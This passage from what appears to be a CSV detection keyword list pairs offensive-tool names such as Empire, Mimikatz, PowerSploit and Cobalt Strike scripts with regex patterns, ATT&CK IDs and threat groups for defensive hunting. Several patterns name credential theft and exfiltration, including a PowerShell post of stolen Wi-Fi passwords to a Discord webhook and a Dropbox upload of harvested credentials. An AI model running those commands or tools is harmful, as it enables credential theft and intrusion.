Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PSInject.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PSInject.ps1*",".{0,1000}Invoke\-PSInject\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1085","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PSInject.ps1*",".{0,1000}Invoke\-PSInject\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*Invoke-PSObfuscation*",".{0,1000}Invoke\-PSObfuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","9","4","N/A","N/A","N/A","N/A" "*Invoke-PsUACme*",".{0,1000}Invoke\-PsUACme.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*Invoke-PsUACme*",".{0,1000}Invoke\-PsUACme.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PsUACme*",".{0,1000}Invoke\-PsUACme.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-PsUACme.ps1*",".{0,1000}Invoke\-PsUACme\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PuttyCreds*",".{0,1000}Invoke\-PuttyCreds.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Invoke-Pwds.ps1*",".{0,1000}Invoke\-Pwds\.ps1.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*Invoke-RBDC*",".{0,1000}Invoke\-RBDC.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-RBDC-over-DAVRPC*",".{0,1000}Invoke\-RBDC\-over\-DAVRPC.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal 
Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-RDPwrap.ps1*",".{0,1000}Invoke\-RDPwrap\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ReflectivePEInjection.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1107","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1083","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1137","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Invoke-ReflectivePEInjection.*",".{0,1000}Invoke\-ReflectivePEInjection\..{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Invoke-ReflectivePEInjection.ps1*",".{0,1000}Invoke\-ReflectivePEInjection\.ps1.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" 
"*Invoke-ReflectivePEInjection.ps1*",".{0,1000}Invoke\-ReflectivePEInjection\.ps1.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*Invoke-RefreshAzureAppTokens -ClientId * -ClientSecret *",".{0,1000}Invoke\-RefreshAzureAppTokens\s\-ClientId\s.{0,1000}\s\-ClientSecret\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-RefreshGraphTokens*",".{0,1000}Invoke\-RefreshGraphTokens.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Use a refresh token to obtain new access tokens","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-RefreshToMSGraphToken -domain -ClientId *",".{0,1000}Invoke\-RefreshToMSGraphToken\s\-domain\s\-ClientId\s.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*Invoke-RefreshToSharePointToken*",".{0,1000}Invoke\-RefreshToSharePointToken.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for 
Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-Reg1c1de*",".{0,1000}Invoke\-Reg1c1de.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-RegistryAlwaysInstallElevatedCheck*",".{0,1000}Invoke\-RegistryAlwaysInstallElevatedCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-RegistryAlwaysInstallElevatedCheck*",".{0,1000}Invoke\-RegistryAlwaysInstallElevatedCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-RegistryAlwaysInstallElevatedCheck*",".{0,1000}Invoke\-RegistryAlwaysInstallElevatedCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-RemoteMimikatz*",".{0,1000}Invoke\-RemoteMimikatz.{0,1000}","offensive_tool_keyword","Mimikatz","PowerShell Scripts focused on Post-Exploitation Capabilities","T1003 - T1055 - T1078","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/xorrior/RandomPS-Scripts","1","1","N/A","10","4","313","89","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z" "*Invoke-RemoteScriptWithOutput*",".{0,1000}Invoke\-RemoteScriptWithOutput.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json)*",".{0,1000}Invoke\-RestMethod\s\-ContentType\s\'Application\/Json\'\s\-Uri\s\$discord\s\-Method\sPost\s\-Body\s\(\$Body\s\|\sConvertTo\-Json\).{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile * -Headers 
*",".{0,1000}Invoke\-RestMethod\s\-Uri\shttps\:\/\/content\.dropboxapi\.com\/2\/files\/upload\s\-Method\sPost\s\s\-InFile\s.{0,1000}\s\s\-Headers\s.{0,1000}","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*Invoke-ReverseSocksProxy*",".{0,1000}Invoke\-ReverseSocksProxy.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*Invoke-ReverseSocksProxy*",".{0,1000}Invoke\-ReverseSocksProxy.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","767","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" "*invokereverttoself*",".{0,1000}invokereverttoself.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Invoke-RevertToSelf*",".{0,1000}Invoke\-RevertToSelf.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" 
